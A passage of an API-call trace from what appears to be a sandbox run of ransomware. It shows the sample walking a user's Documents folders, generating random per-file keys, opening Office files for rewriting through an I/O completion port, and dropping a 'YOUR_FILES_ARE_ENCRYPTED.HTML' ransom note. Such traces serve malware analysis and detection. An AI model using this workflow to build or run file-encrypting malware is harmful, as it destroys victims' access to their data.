dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x33c [0124.105] GetFileSizeEx (in: hFile=0x33c, lpFileSize=0x19e4a4 | out: lpFileSize=0x19e4a4*=26240) returned 1 [0124.106] GetProcessHeap () returned 0x600000 [0124.106] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x336df60 [0124.106] wsprintfW (in: param_1=0x19e3be, param_2="%02X" | out: param_1="F7") returned 2 [0124.106] wsprintfW (in: param_1=0x19e3c2, param_2="%02X" | out: param_1="B8") returned 2 [0124.106] wsprintfW (in: param_1=0x19e3c6, param_2="%02X" | out: param_1="2A") returned 2 [0124.106] wsprintfW (in: param_1=0x19e3ca, param_2="%02X" | out: param_1="1F") returned 2 [0124.106] wsprintfW (in: param_1=0x19e3ce, param_2="%02X" | out: param_1="5E") returned 2 [0124.106] wsprintfW (in: param_1=0x19e3d2, param_2="%02X" | out: param_1="29") returned 2 [0124.106] wsprintfW (in: param_1=0x19e3d6, param_2="%02X" | out: param_1="94") returned 2 [0124.106] wsprintfW (in: param_1=0x19e3da, param_2="%02X" | out: param_1="8E") returned 2 [0124.106] wsprintfW (in: param_1=0x19e3de, param_2="%02X" | out: param_1="A8") returned 2 [0124.106] wsprintfW (in: param_1=0x19e3e2, param_2="%02X" | out: param_1="D3") returned 2 [0124.106] wsprintfW (in: param_1=0x19e3e6, param_2="%02X" | out: param_1="7E") returned 2 [0124.106] wsprintfW (in: param_1=0x19e3ea, param_2="%02X" | out: param_1="2D") returned 2 [0124.106] wsprintfW (in: param_1=0x19e3ee, param_2="%02X" | out: param_1="64") returned 2 [0124.106] wsprintfW (in: param_1=0x19e3f2, param_2="%02X" | out: param_1="E6") returned 2 [0124.107] wsprintfW (in: param_1=0x19e3f6, param_2="%02X" | out: param_1="0E") returned 2 [0124.107] wsprintfW (in: param_1=0x19e3fa, param_2="%02X" | out: param_1="91") returned 2 [0124.107] wsprintfW (in: param_1=0x19e3fe, param_2="%02X" | out: param_1="31") returned 2 [0124.107] wsprintfW (in: param_1=0x19e402, param_2="%02X" | out: param_1="04") returned 2 [0124.107] wsprintfW (in: param_1=0x19e406, param_2="%02X" | out: param_1="7D") returned 2 [0124.107] wsprintfW (in: param_1=0x19e40a, param_2="%02X" | out: param_1="62") returned 2 [0124.107] wsprintfW (in: param_1=0x19e40e, param_2="%02X" | out: param_1="92") returned 2 [0124.107] wsprintfW (in: param_1=0x19e412, param_2="%02X" | out: param_1="20") returned 2 [0124.107] wsprintfW (in: param_1=0x19e416, param_2="%02X" | out: param_1="90") returned 2 [0124.107] wsprintfW (in: param_1=0x19e41a, param_2="%02X" | out: param_1="A6") returned 2 [0124.107] wsprintfW (in: param_1=0x19e41e, param_2="%02X" | out: param_1="7F") returned 2 [0124.107] wsprintfW (in: param_1=0x19e422, param_2="%02X" | out: param_1="AD") returned 2 [0124.107] wsprintfW (in: param_1=0x19e426, param_2="%02X" | out: param_1="BD") returned 2 [0124.107] wsprintfW (in: param_1=0x19e42a, param_2="%02X" | out: param_1="D1") returned 2 [0124.107] wsprintfW (in: param_1=0x19e42e, param_2="%02X" | out: param_1="F2") returned 2 [0124.107] wsprintfW (in: param_1=0x19e432, param_2="%02X" | out: param_1="82") returned 2 [0124.107] wsprintfW (in: param_1=0x19e436, param_2="%02X" | out: param_1="AE") returned 2 [0124.107] wsprintfW (in: param_1=0x19e43a, param_2="%02X" | out: param_1="51") returned 2 [0124.108] lstrcpyW (in: lpString1=0x337e014, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\4v07jmXO0a\\UsMBTgT.doc" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\4v07jmXO0a\\UsMBTgT.doc") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\4v07jmXO0a\\UsMBTgT.doc" [0124.108] CreateIoCompletionPort (FileHandle=0x33c, ExistingCompletionPort=0x274, CompletionKey=0x336df60, NumberOfConcurrentThreads=0x0) returned 0x274 [0124.108] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x336df60, lpOverlapped=0x336df60) returned 1 [0124.111] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x596f5e20, ftCreationTime.dwHighDateTime=0x1d70030, ftLastAccessTime.dwLowDateTime=0x32aa98f0, ftLastAccessTime.dwHighDateTime=0x1d70507, ftLastWriteTime.dwLowDateTime=0x32aa98f0, ftLastWriteTime.dwHighDateTime=0x1d70507, nFileSizeHigh=0x0, nFileSizeLow=0x80b2, dwReserved0=0x6f4618, dwReserved1=0x62ec98, cFileName="xVP2P6AqYDoz.ppt", cAlternateFileName="XVP2P6~1.PPT")) returned 1 [0124.111] StrStrIW (lpFirst="xVP2P6AqYDoz.ppt", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.111] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\4v07jmXO0a\\xVP2P6AqYDoz.ppt") returned 88 [0124.111] PathFindExtensionW (pszPath="xVP2P6AqYDoz.ppt") returned=".ppt" [0124.111] lstrlenW (lpString=".ppt") returned 4 [0124.111] PathFindExtensionW (pszPath="xVP2P6AqYDoz.ppt") returned=".ppt" [0124.112] SystemFunction036 (in: RandomBuffer=0x19e480, RandomBufferLength=0x20 | out: RandomBuffer=0x19e480) returned 1 [0124.112] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\4v07jmXO0a\\xVP2P6AqYDoz.ppt" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\6d2j8wrsz4uysx4ge\\k68ziv\\4v07jmxo0a\\xvp2p6aqydoz.ppt"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x33c [0124.112] GetFileSizeEx (in: hFile=0x33c, lpFileSize=0x19e4a4 | out: lpFileSize=0x19e4a4*=32946) returned 1 [0124.112] GetProcessHeap () returned 0x600000 [0124.112] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x336df60 [0124.113] wsprintfW (in: param_1=0x19e3be, param_2="%02X" | out: param_1="A6") returned 2 [0124.113] wsprintfW (in: param_1=0x19e3c2, param_2="%02X" | out: param_1="C2") returned 2 [0124.113] wsprintfW (in: param_1=0x19e3c6, param_2="%02X" | out: param_1="64") returned 2 [0124.113] wsprintfW (in: param_1=0x19e3ca, param_2="%02X" | out: param_1="0A") returned 2 [0124.113] wsprintfW (in: param_1=0x19e3ce, param_2="%02X" | out: param_1="F3") returned 2 [0124.113] wsprintfW (in: param_1=0x19e3d2, param_2="%02X" | out: param_1="22") returned 2 [0124.113] wsprintfW (in: param_1=0x19e3d6, param_2="%02X" | out: param_1="18") returned 2 [0124.113] wsprintfW (in: param_1=0x19e3da, param_2="%02X" | out: param_1="0B") returned 2 [0124.113] wsprintfW (in: param_1=0x19e3de, param_2="%02X" | out: param_1="45") returned 2 [0124.113] wsprintfW (in: param_1=0x19e3e2, param_2="%02X" | out: param_1="73") returned 2 [0124.113] wsprintfW (in: param_1=0x19e3e6, param_2="%02X" | out: param_1="44") returned 2 [0124.113] wsprintfW (in: param_1=0x19e3ea, param_2="%02X" | out: param_1="7E") returned 2 [0124.113] wsprintfW (in: param_1=0x19e3ee, param_2="%02X" | out: param_1="11") returned 2 [0124.113] wsprintfW (in: param_1=0x19e3f2, param_2="%02X" | out: param_1="2B") returned 2 [0124.113] wsprintfW (in: param_1=0x19e3f6, param_2="%02X" | out: param_1="C7") returned 2 [0124.113] wsprintfW (in: param_1=0x19e3fa, param_2="%02X" | out: param_1="96") returned 2 [0124.113] wsprintfW (in: param_1=0x19e3fe, param_2="%02X" | out: param_1="AA") returned 2 [0124.114] wsprintfW (in: param_1=0x19e402, param_2="%02X" | out: param_1="B5") returned 2 [0124.114] wsprintfW (in: param_1=0x19e406, param_2="%02X" | out: param_1="A4") returned 2 [0124.114] wsprintfW (in: param_1=0x19e40a, param_2="%02X" | out: param_1="41") returned 2 [0124.114] wsprintfW (in: param_1=0x19e40e, param_2="%02X" | out: param_1="10") returned 2 [0124.114] wsprintfW (in: param_1=0x19e412, param_2="%02X" | out: param_1="F8") returned 2 [0124.114] wsprintfW (in: param_1=0x19e416, param_2="%02X" | out: param_1="5A") returned 2 [0124.114] wsprintfW (in: param_1=0x19e41a, param_2="%02X" | out: param_1="33") returned 2 [0124.114] wsprintfW (in: param_1=0x19e41e, param_2="%02X" | out: param_1="95") returned 2 [0124.114] wsprintfW (in: param_1=0x19e422, param_2="%02X" | out: param_1="53") returned 2 [0124.114] wsprintfW (in: param_1=0x19e426, param_2="%02X" | out: param_1="37") returned 2 [0124.114] wsprintfW (in: param_1=0x19e42a, param_2="%02X" | out: param_1="FB") returned 2 [0124.114] wsprintfW (in: param_1=0x19e42e, param_2="%02X" | out: param_1="A6") returned 2 [0124.114] wsprintfW (in: param_1=0x19e432, param_2="%02X" | out: param_1="A8") returned 2 [0124.114] wsprintfW (in: param_1=0x19e436, param_2="%02X" | out: param_1="64") returned 2 [0124.114] wsprintfW (in: param_1=0x19e43a, param_2="%02X" | out: param_1="08") returned 2 [0124.114] lstrcpyW (in: lpString1=0x337e014, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\4v07jmXO0a\\xVP2P6AqYDoz.ppt" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\4v07jmXO0a\\xVP2P6AqYDoz.ppt") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\4v07jmXO0a\\xVP2P6AqYDoz.ppt" [0124.114] CreateIoCompletionPort (FileHandle=0x33c, ExistingCompletionPort=0x274, CompletionKey=0x336df60, NumberOfConcurrentThreads=0x0) returned 0x274 [0124.114] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x336df60, lpOverlapped=0x336df60) returned 1 [0124.118] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x596f5e20, ftCreationTime.dwHighDateTime=0x1d70030, ftLastAccessTime.dwLowDateTime=0x32aa98f0, ftLastAccessTime.dwHighDateTime=0x1d70507, ftLastWriteTime.dwLowDateTime=0x32aa98f0, ftLastWriteTime.dwHighDateTime=0x1d70507, nFileSizeHigh=0x0, nFileSizeLow=0x80b2, dwReserved0=0x6f4618, dwReserved1=0x62ec98, cFileName="xVP2P6AqYDoz.ppt", cAlternateFileName="XVP2P6~1.PPT")) returned 0 [0124.118] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0124.118] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\4v07jmXO0a\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 101 [0124.118] GetProcessHeap () returned 0x600000 [0124.118] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3155038 [0124.119] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\4v07jmXO0a\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\6d2j8wrsz4uysx4ge\\k68ziv\\4v07jmxo0a\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0124.120] WriteFile (in: hFile=0x31c, lpBuffer=0x3155038*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x3155038*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0124.121] CloseHandle (hObject=0x31c) returned 1 [0124.121] GetProcessHeap () returned 0x600000 [0124.121] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3155038 | out: hHeap=0x600000) returned 1 [0124.121] GetProcessHeap () returned 0x600000 [0124.121] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0124.121] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40fa42a0, ftCreationTime.dwHighDateTime=0x1d70185, ftLastAccessTime.dwLowDateTime=0xb54ed3e0, ftLastAccessTime.dwHighDateTime=0x1d7028f, ftLastWriteTime.dwLowDateTime=0xb54ed3e0, ftLastWriteTime.dwHighDateTime=0x1d7028f, nFileSizeHigh=0x0, nFileSizeLow=0xda66, dwReserved0=0x62ecfc, dwReserved1=0x62ec90, cFileName="6lHdV_3TJ2AzSmdZ1n.pptx", cAlternateFileName="6LHDV_~1.PPT")) returned 1 [0124.121] StrStrIW (lpFirst="6lHdV_3TJ2AzSmdZ1n.pptx", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.121] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\6lHdV_3TJ2AzSmdZ1n.pptx") returned 84 [0124.121] PathFindExtensionW (pszPath="6lHdV_3TJ2AzSmdZ1n.pptx") returned=".pptx" [0124.121] lstrlenW (lpString=".pptx") returned 5 [0124.121] PathFindExtensionW (pszPath="6lHdV_3TJ2AzSmdZ1n.pptx") returned=".pptx" [0124.121] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0124.121] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\6lHdV_3TJ2AzSmdZ1n.pptx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\6d2j8wrsz4uysx4ge\\k68ziv\\6lhdv_3tj2azsmdz1n.pptx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0124.122] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=55910) returned 1 [0124.122] GetProcessHeap () returned 0x600000 [0124.122] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x336df60 [0124.122] wsprintfW (in: param_1=0x19e6d2, param_2="%02X" | out: param_1="AA") returned 2 [0124.122] wsprintfW (in: param_1=0x19e6d6, param_2="%02X" | out: param_1="87") returned 2 [0124.122] wsprintfW (in: param_1=0x19e6da, param_2="%02X" | out: param_1="04") returned 2 [0124.122] wsprintfW (in: param_1=0x19e6de, param_2="%02X" | out: param_1="7E") returned 2 [0124.122] wsprintfW (in: param_1=0x19e6e2, param_2="%02X" | out: param_1="EB") returned 2 [0124.122] wsprintfW (in: param_1=0x19e6e6, param_2="%02X" | out: param_1="AA") returned 2 [0124.122] wsprintfW (in: param_1=0x19e6ea, param_2="%02X" | out: param_1="60") returned 2 [0124.122] wsprintfW (in: param_1=0x19e6ee, param_2="%02X" | out: param_1="2B") returned 2 [0124.122] wsprintfW (in: param_1=0x19e6f2, param_2="%02X" | out: param_1="E1") returned 2 [0124.122] wsprintfW (in: param_1=0x19e6f6, param_2="%02X" | out: param_1="25") returned 2 [0124.122] wsprintfW (in: param_1=0x19e6fa, param_2="%02X" | out: param_1="67") returned 2 [0124.123] wsprintfW (in: param_1=0x19e6fe, param_2="%02X" | out: param_1="A1") returned 2 [0124.123] wsprintfW (in: param_1=0x19e702, param_2="%02X" | out: param_1="16") returned 2 [0124.123] wsprintfW (in: param_1=0x19e706, param_2="%02X" | out: param_1="1B") returned 2 [0124.123] wsprintfW (in: param_1=0x19e70a, param_2="%02X" | out: param_1="04") returned 2 [0124.123] wsprintfW (in: param_1=0x19e70e, param_2="%02X" | out: param_1="AC") returned 2 [0124.123] wsprintfW (in: param_1=0x19e712, param_2="%02X" | out: param_1="81") returned 2 [0124.123] wsprintfW (in: param_1=0x19e716, param_2="%02X" | out: param_1="39") returned 2 [0124.123] wsprintfW (in: param_1=0x19e71a, param_2="%02X" | out: param_1="E4") returned 2 [0124.123] wsprintfW (in: param_1=0x19e71e, param_2="%02X" | out: param_1="0E") returned 2 [0124.123] wsprintfW (in: param_1=0x19e722, param_2="%02X" | out: param_1="98") returned 2 [0124.123] wsprintfW (in: param_1=0x19e726, param_2="%02X" | out: param_1="04") returned 2 [0124.123] wsprintfW (in: param_1=0x19e72a, param_2="%02X" | out: param_1="5F") returned 2 [0124.123] wsprintfW (in: param_1=0x19e72e, param_2="%02X" | out: param_1="D8") returned 2 [0124.123] wsprintfW (in: param_1=0x19e732, param_2="%02X" | out: param_1="4E") returned 2 [0124.123] wsprintfW (in: param_1=0x19e736, param_2="%02X" | out: param_1="81") returned 2 [0124.123] wsprintfW (in: param_1=0x19e73a, param_2="%02X" | out: param_1="7E") returned 2 [0124.123] wsprintfW (in: param_1=0x19e73e, param_2="%02X" | out: param_1="77") returned 2 [0124.123] wsprintfW (in: param_1=0x19e742, param_2="%02X" | out: param_1="9E") returned 2 [0124.123] wsprintfW (in: param_1=0x19e746, param_2="%02X" | out: param_1="B9") returned 2 [0124.123] wsprintfW (in: param_1=0x19e74a, param_2="%02X" | out: param_1="7C") returned 2 [0124.123] wsprintfW (in: param_1=0x19e74e, param_2="%02X" | out: param_1="6A") returned 2 [0124.124] lstrcpyW (in: lpString1=0x337e014, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\6lHdV_3TJ2AzSmdZ1n.pptx" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\6lHdV_3TJ2AzSmdZ1n.pptx") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\6lHdV_3TJ2AzSmdZ1n.pptx" [0124.124] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x336df60, NumberOfConcurrentThreads=0x0) returned 0x274 [0124.124] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x336df60, lpOverlapped=0x336df60) returned 1 [0124.127] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cc03950, ftCreationTime.dwHighDateTime=0x1d70593, ftLastAccessTime.dwLowDateTime=0xe338fbf0, ftLastAccessTime.dwHighDateTime=0x1d70a46, ftLastWriteTime.dwLowDateTime=0xe338fbf0, ftLastWriteTime.dwHighDateTime=0x1d70a46, nFileSizeHigh=0x0, nFileSizeLow=0x10ab5, dwReserved0=0x62ecfc, dwReserved1=0x62ec90, cFileName="71nL LIFl3JmMfQUnT1-.ods", cAlternateFileName="71NLLI~1.ODS")) returned 1 [0124.127] StrStrIW (lpFirst="71nL LIFl3JmMfQUnT1-.ods", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.127] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\71nL LIFl3JmMfQUnT1-.ods") returned 85 [0124.127] PathFindExtensionW (pszPath="71nL LIFl3JmMfQUnT1-.ods") returned=".ods" [0124.127] lstrlenW (lpString=".ods") returned 4 [0124.127] PathFindExtensionW (pszPath="71nL LIFl3JmMfQUnT1-.ods") returned=".ods" [0124.127] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0124.127] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\71nL LIFl3JmMfQUnT1-.ods" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\6d2j8wrsz4uysx4ge\\k68ziv\\71nl lifl3jmmfqunt1-.ods"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0124.128] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=68277) returned 1 [0124.128] GetProcessHeap () returned 0x600000 [0124.128] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x336df60 [0124.169] wsprintfW (in: param_1=0x19e6d2, param_2="%02X" | out: param_1="1E") returned 2 [0124.169] wsprintfW (in: param_1=0x19e6d6, param_2="%02X" | out: param_1="C4") returned 2 [0124.169] wsprintfW (in: param_1=0x19e6da, param_2="%02X" | out: param_1="66") returned 2 [0124.169] wsprintfW (in: param_1=0x19e6de, param_2="%02X" | out: param_1="79") returned 2 [0124.169] wsprintfW (in: param_1=0x19e6e2, param_2="%02X" | out: param_1="B1") returned 2 [0124.169] wsprintfW (in: param_1=0x19e6e6, param_2="%02X" | out: param_1="FC") returned 2 [0124.169] wsprintfW (in: param_1=0x19e6ea, param_2="%02X" | out: param_1="FD") returned 2 [0124.169] wsprintfW (in: param_1=0x19e6ee, param_2="%02X" | out: param_1="D9") returned 2 [0124.169] wsprintfW (in: param_1=0x19e6f2, param_2="%02X" | out: param_1="EE") returned 2 [0124.169] wsprintfW (in: param_1=0x19e6f6, param_2="%02X" | out: param_1="97") returned 2 [0124.169] wsprintfW (in: param_1=0x19e6fa, param_2="%02X" | out: param_1="B2") returned 2 [0124.169] wsprintfW (in: param_1=0x19e6fe, param_2="%02X" | out: param_1="A9") returned 2 [0124.169] wsprintfW (in: param_1=0x19e702, param_2="%02X" | out: param_1="21") returned 2 [0124.169] wsprintfW (in: param_1=0x19e706, param_2="%02X" | out: param_1="5E") returned 2 [0124.169] wsprintfW (in: param_1=0x19e70a, param_2="%02X" | out: param_1="5C") returned 2 [0124.169] wsprintfW (in: param_1=0x19e70e, param_2="%02X" | out: param_1="46") returned 2 [0124.169] wsprintfW (in: param_1=0x19e712, param_2="%02X" | out: param_1="B4") returned 2 [0124.169] wsprintfW (in: param_1=0x19e716, param_2="%02X" | out: param_1="C4") returned 2 [0124.169] wsprintfW (in: param_1=0x19e71a, param_2="%02X" | out: param_1="86") returned 2 [0124.169] wsprintfW (in: param_1=0x19e71e, param_2="%02X" | out: param_1="F9") returned 2 [0124.169] wsprintfW (in: param_1=0x19e722, param_2="%02X" | out: param_1="DB") returned 2 [0124.170] wsprintfW (in: param_1=0x19e726, param_2="%02X" | out: param_1="53") returned 2 [0124.170] wsprintfW (in: param_1=0x19e72a, param_2="%02X" | out: param_1="29") returned 2 [0124.170] wsprintfW (in: param_1=0x19e72e, param_2="%02X" | out: param_1="97") returned 2 [0124.170] wsprintfW (in: param_1=0x19e732, param_2="%02X" | out: param_1="89") returned 2 [0124.170] wsprintfW (in: param_1=0x19e736, param_2="%02X" | out: param_1="23") returned 2 [0124.170] wsprintfW (in: param_1=0x19e73a, param_2="%02X" | out: param_1="40") returned 2 [0124.170] wsprintfW (in: param_1=0x19e73e, param_2="%02X" | out: param_1="6A") returned 2 [0124.170] wsprintfW (in: param_1=0x19e742, param_2="%02X" | out: param_1="7C") returned 2 [0124.170] wsprintfW (in: param_1=0x19e746, param_2="%02X" | out: param_1="6B") returned 2 [0124.170] wsprintfW (in: param_1=0x19e74a, param_2="%02X" | out: param_1="0F") returned 2 [0124.170] wsprintfW (in: param_1=0x19e74e, param_2="%02X" | out: param_1="6D") returned 2 [0124.170] lstrcpyW (in: lpString1=0x337e014, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\71nL LIFl3JmMfQUnT1-.ods" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\71nL LIFl3JmMfQUnT1-.ods") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\71nL LIFl3JmMfQUnT1-.ods" [0124.170] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x336df60, NumberOfConcurrentThreads=0x0) returned 0x274 [0124.170] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x336df60, lpOverlapped=0x336df60) returned 1 [0124.176] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a20c1b0, ftCreationTime.dwHighDateTime=0x1d6fb79, ftLastAccessTime.dwLowDateTime=0x62510eb0, ftLastAccessTime.dwHighDateTime=0x1d6fd62, ftLastWriteTime.dwLowDateTime=0x62510eb0, ftLastWriteTime.dwHighDateTime=0x1d6fd62, nFileSizeHigh=0x0, nFileSizeLow=0x13d34, dwReserved0=0x62ecfc, dwReserved1=0x62ec90, cFileName="dpKllgf2Wvl9L.pps", cAlternateFileName="DPKLLG~1.PPS")) returned 1 [0124.176] StrStrIW (lpFirst="dpKllgf2Wvl9L.pps", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.176] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\dpKllgf2Wvl9L.pps") returned 78 [0124.176] PathFindExtensionW (pszPath="dpKllgf2Wvl9L.pps") returned=".pps" [0124.176] lstrlenW (lpString=".pps") returned 4 [0124.176] PathFindExtensionW (pszPath="dpKllgf2Wvl9L.pps") returned=".pps" [0124.176] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0124.176] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\dpKllgf2Wvl9L.pps" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\6d2j8wrsz4uysx4ge\\k68ziv\\dpkllgf2wvl9l.pps"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0124.177] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=81204) returned 1 [0124.177] GetProcessHeap () returned 0x600000 [0124.177] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0124.180] wsprintfW (in: param_1=0x19e6d2, param_2="%02X" | out: param_1="BA") returned 2 [0124.180] wsprintfW (in: param_1=0x19e6d6, param_2="%02X" | out: param_1="03") returned 2 [0124.180] wsprintfW (in: param_1=0x19e6da, param_2="%02X" | out: param_1="8E") returned 2 [0124.180] wsprintfW (in: param_1=0x19e6de, param_2="%02X" | out: param_1="1F") returned 2 [0124.180] wsprintfW (in: param_1=0x19e6e2, param_2="%02X" | out: param_1="0A") returned 2 [0124.180] wsprintfW (in: param_1=0x19e6e6, param_2="%02X" | out: param_1="FF") returned 2 [0124.180] wsprintfW (in: param_1=0x19e6ea, param_2="%02X" | out: param_1="9C") returned 2 [0124.180] wsprintfW (in: param_1=0x19e6ee, param_2="%02X" | out: param_1="29") returned 2 [0124.180] wsprintfW (in: param_1=0x19e6f2, param_2="%02X" | out: param_1="C9") returned 2 [0124.180] wsprintfW (in: param_1=0x19e6f6, param_2="%02X" | out: param_1="97") returned 2 [0124.180] wsprintfW (in: param_1=0x19e6fa, param_2="%02X" | out: param_1="13") returned 2 [0124.180] wsprintfW (in: param_1=0x19e6fe, param_2="%02X" | out: param_1="0E") returned 2 [0124.180] wsprintfW (in: param_1=0x19e702, param_2="%02X" | out: param_1="C8") returned 2 [0124.180] wsprintfW (in: param_1=0x19e706, 